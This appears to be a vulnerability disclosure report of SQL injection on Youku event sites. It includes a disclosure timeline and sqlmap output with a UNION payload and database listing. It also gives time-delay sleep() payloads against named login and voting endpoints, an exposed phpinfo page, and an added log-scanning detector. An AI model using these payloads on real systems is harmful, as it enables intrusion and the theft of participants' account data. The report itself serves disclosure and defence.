2014-03-01: Details reported to the vendor, awaiting vendor handling
2014-03-01: Vendor confirmed; details disclosed to the vendor only
2014-03-11: Details disclosed to core white hats and experts in the relevant field
2014-03-21: Details disclosed to regular white hats
2014-03-31: Details disclosed to intern white hats
2014-04-15: Details disclosed to the public
SQL injection in a Youku event site leaks the account information of a large number of event participants. == That's what you get for going after freebies
Injection point: events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1
Injected parameter: uid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---
available databases [3]:
[*] db_events
[*] information_schema
[*] test

Database: db_events
[233 tables]
Heh, there are also a few POST injection points. Common tools could not dump results from them, but a time delay confirms they exist.
http://events.youku.com/bwnzb/api/_login.php
uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e
http://events.youku.com/bwnzb/phase-2/api/_login.php
uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e
http://events.youku.com/familymart/api/?q=ajax/doSupport
type=(select(sleep(3))v)&work_id=24526
or type=test&work_id=(select(sleep(3))v)
As a bonus, a phpinfo page: http://events.youku.com/2010/wtcc/phpinfo.php
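The UNION and time-delay payloads above leave recognisable traces in web server logs. The following Python is an added example, not code from the original report or from Youku: it percent-decodes each parameter of constructed sample request lines (the "METHOD target [form-body]" log format is an assumption) and flags the payload shapes this report shows, plus the exposed phpinfo path.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines (not real traffic), modelled on the payload
# shapes in the report. Assumed log format: "METHOD target [form-body]".
SAMPLE_REQUESTS = [
    "GET /2011/pepsihappyness/api/?act=my_ecards&uid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(CHAR(58,99),NULL)%23",
    "POST /bwnzb/api/_login.php uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e",
    "GET /familymart/api/?q=ajax/doSupport&type=test&work_id=(select(sleep(3))v)",
    "GET /2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&uid=34853",
    "GET /2010/wtcc/phpinfo.php",
]

# Rules run against each percent-decoded parameter value. A bare comment marker
# (#, /* */) is deliberately not a rule: the site's own legitimate parameter
# pageslists=%23ecards_pageslists decodes to "#..." and would false-positive.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "char_concat": re.compile(r"\bconcat\s*\(\s*char\s*\(", re.I),
}
INFO_LEAK_PATHS = ("phpinfo.php",)

def scan_request(line):
    """Return [(where, rule), ...] for one request line; [] when it looks clean."""
    parts = line.split(" ", 2)
    target = parts[1] if len(parts) > 1 else ""
    findings = []
    if urlsplit(target).path.lower().endswith(INFO_LEAK_PATHS):
        findings.append(("path", "info_leak"))
    sources = [urlsplit(target).query]
    if len(parts) > 2:  # a POST body, when the log line carries one
        sources.append(parts[2])
    for src in sources:
        # parse_qsl percent-decodes once, undoing the %3d / %2c seen in the report
        for name, value in parse_qsl(src, keep_blank_values=True):
            for rule, rx in PATTERNS.items():
                if rx.search(value):
                    findings.append((name, rule))
    return findings

def scan_log(lines):
    """Map each flagged request line to its findings; clean lines are omitted."""
    report = {}
    for line in lines:
        hits = scan_request(line)
        if hits:
            report[line] = hits
    return report
```

Pattern matching of this kind is a detection aid that can be evaded; the fix for the injection itself is to bind uid and uname as parameters of prepared statements instead of concatenating them into SQL.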
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-03-01 20:08
Thanks for the heads-up, we will fix it right away
None yet